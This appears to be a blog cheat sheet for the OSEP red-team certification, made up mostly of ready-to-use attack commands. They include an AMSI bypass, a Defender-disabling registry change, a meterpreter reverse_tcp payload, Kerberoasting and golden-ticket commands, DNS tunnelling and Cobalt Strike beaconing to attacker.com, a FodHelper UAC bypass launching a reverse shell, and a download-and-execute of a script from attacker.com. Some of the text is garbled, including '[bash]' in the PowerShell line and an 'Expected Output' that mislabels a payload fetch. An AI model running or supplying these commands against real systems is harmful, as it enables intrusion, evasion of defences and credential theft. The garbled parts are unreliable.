From OSCP to OSEP: The Ultimate Red Teaming Cheatsheet

By /

Listen to this Post

If OSCP taught us how to break in, OSEP teaches us how to stay in—undetected. This isn’t just another pentesting cert—it’s a full-blown adversarial training designed to teach advanced offensive security techniques.

🔗 Learn More: OSEP Certification Details
📝 Further Insights: Medium on OSEP

You Should Know:

  1. EDR & AMSI Bypass – Outsmart Modern Defenses

– AMSI Bypass with PowerShell: 

[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

– Disabling EDR via Registry (Mock Example): 

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

2. Custom Shellcoding – Build Undetectable Payloads

  • Generating XOR-Encoded Shellcode with msfvenom: 
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw -o payload.bin
  • Using `scdbg` for Shellcode Analysis: 
    scdbg /f payload.bin /s 1000000

3. AD Exploitation – Move Laterally, Escalate, Dominate

  • Kerberoasting with Impacket: 
    python GetUserSPNs.py -request -dc-ip 10.10.10.1 domain/user:password
  • Golden Ticket Attack: 
    mimikatz  kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

4. Covert C2 – Stay Stealthy, Stay Persistent

  • DNS Tunneling with dnscat2: 
    sudo ruby dnscat2.rb --dns domain=attacker.com --secret=mysecret
  • HTTPS Beaconing with Cobalt Strike: 
    Start-Process -NoNewWindow -FilePath "C:\beacon.exe" -ArgumentList "-https https://attacker.com -sleep 5000"
  1. Windows Exploitation – Master UAC, Tokens & LOLBAS

– Bypassing UAC via FodHelper: 

reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\reverse_shell.exe" /f

– Abusing `Rundll32` for Execution: 

rundll32.exe \attacker.com\share\malicious.dll,EntryPoint

What Undercode Say

OSEP is the evolution of red teaming—where persistence, evasion, and deep system manipulation become second nature. Unlike OSCP, which focuses on initial access, OSEP dives into maintaining stealth in hostile environments. Key takeaways:
– EDR/AMSI bypasses are critical for modern engagements.
– Living-off-the-land (LOLBAS) reduces detection risks.
– Custom C2 frameworks outperform off-the-shelf tools in targeted attacks.

Expected Output:

 Example: Checking for AMSI in PowerShell 
$ExecutionContext.SessionState.LanguageMode 
(New-Object Net.WebClient).DownloadString("http://attacker.com/amsibypass.ps1") | IEX

🔗 Further Reading:

References:

Reported By: Alexrweyemamu From – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: